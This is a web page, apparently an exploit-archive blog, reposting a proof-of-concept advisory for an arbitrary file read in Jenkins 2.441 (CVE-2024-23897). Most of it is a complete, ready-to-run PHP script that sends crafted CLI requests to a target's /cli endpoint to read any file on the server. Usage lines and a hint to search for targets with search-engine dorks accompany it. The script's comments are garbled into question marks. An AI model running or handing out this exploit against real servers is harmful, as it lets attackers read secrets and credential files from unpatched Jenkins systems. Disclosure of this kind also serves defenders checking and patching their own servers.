Latest Tech

Latest Posts

Jenkins 2.441 Arbitrary File Read

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 107
Jenkins 2.441 Arbitrary File Read
Jenkins 2.441 Arbitrary File Read
Jenkins 2.441 Arbitrary File Read

=============================================================================================================================================
| # Title Jenkins 2.441 Arbitrary File Read

=============================================================================================================================================
| # Title : Jenkins 2.441 read files Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.jenkins.io/changelog/2.441/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: read files in Jenkins

(Related : https://packetstorm.news/files/id/188696/ Related CVE numbers: CVE-2024-23897 ) .

[+] save code as poc.php.

[+] Usage: php script.php -u <Jenkins URL> -f <file path> [-p <proxy>]

[+] PayLoad :


<?php

// ????? ??????? SSL ???????? ??????? ???????
stream_context_set_default([
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
]
]);

// ????? ??????? ??????? ?? ???????
const RED = "\033[91m";
const GREEN = "\033[92m";
const YELLOW = "\033[93m";
const ENDC = "\033[0m";
const ENCODING = "UTF-8";

// ???? ?????? ?????? ????? ????????
function jenkins_arg($string, $operation) {
$out_bytes = "\x00\x00";
$out_bytes .= pack("n", strlen($string) + 2);
$out_bytes .= chr($operation);
$out_bytes .= pack("n", strlen($string));
$out_bytes .= $string;
return $out_bytes;
}

// ???? ?????? ??? ????? ?????
function send_upload_request($url, $uuid_str, $file_path, $useragent, $proxy) {
usleep(300000);

$data = jenkins_arg("connect-node", 0) . jenkins_arg("@" . $file_path, 0) . jenkins_arg(ENCODING, 2) . jenkins_arg("en", 1) . jenkins_arg("", 3);

$opts = [
'http' => [
'method' => 'POST',
'header' => [
"User-Agent: $useragent",
"Session: $uuid_str",
"Side: upload",
"Content-type: application/octet-stream"
],
'content' => $data,
'timeout' => 3
]
];
if ($proxy) {
$opts['http']['proxy'] = $proxy;
$opts['http']['request_fulluri'] = true;
}

$context = stream_context_create($opts);
@file_get_contents($url . "/cli?remoting=false", false, $context);
}

// ???? ?????? ??? ????? ?????
function send_download_request($url, $uuid_str, $useragent, $proxy) {
$opts = [
'http' => [
'method' => 'POST',
'header' => [
"User-Agent: $useragent",
"Session: $uuid_str",
"Side: download"
],
'timeout' => 3
]
];
if ($proxy) {
$opts['http']['proxy'] = $proxy;
$opts['http']['request_fulluri'] = true;
}

$context = stream_context_create($opts);
$response = @file_get_contents($url . "/cli?remoting=false", false, $context);

if (strpos($response, "No such file:") !== false) {
echo "File does not exist\n";
return false;
}
if (strpos($response, "No such agent") !== false) {
preg_match_all('/No such agent \"(.*?)\"/', $response, $matches);
return isset($matches[1]) ? implode("\n", $matches[1]) : "";
}

return trim(str_replace("\x00", "\n", $response));
}

// ???? ?????? ????? ??? Jenkins
function read_file($url, $file_path, $useragent, $proxy) {
$uuid_str = uniqid();

send_upload_request($url, $uuid_str, $file_path, $useragent, $proxy);

$file_contents = send_download_request($url, $uuid_str, $useragent, $proxy);
if ($file_contents) {
echo $file_contents . "\n";
} else {
echo "<empty>\n";
}
}

// ????? ?????
$options = getopt("u:f:p:", ["url:", "file:", "proxy:"]);
$url = $options['u'] ?? $options['url'] ?? '';
$file = $options['f'] ?? $options['file'] ?? '';
$proxy = $options['p'] ?? $options['proxy'] ?? '';
$useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36";

if (!$url || !$file) {
exit("Usage: php script.php -u <Jenkins URL> -f <file path> [-p <proxy>]\n");
}

read_file($url, $file, $useragent, $proxy);




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.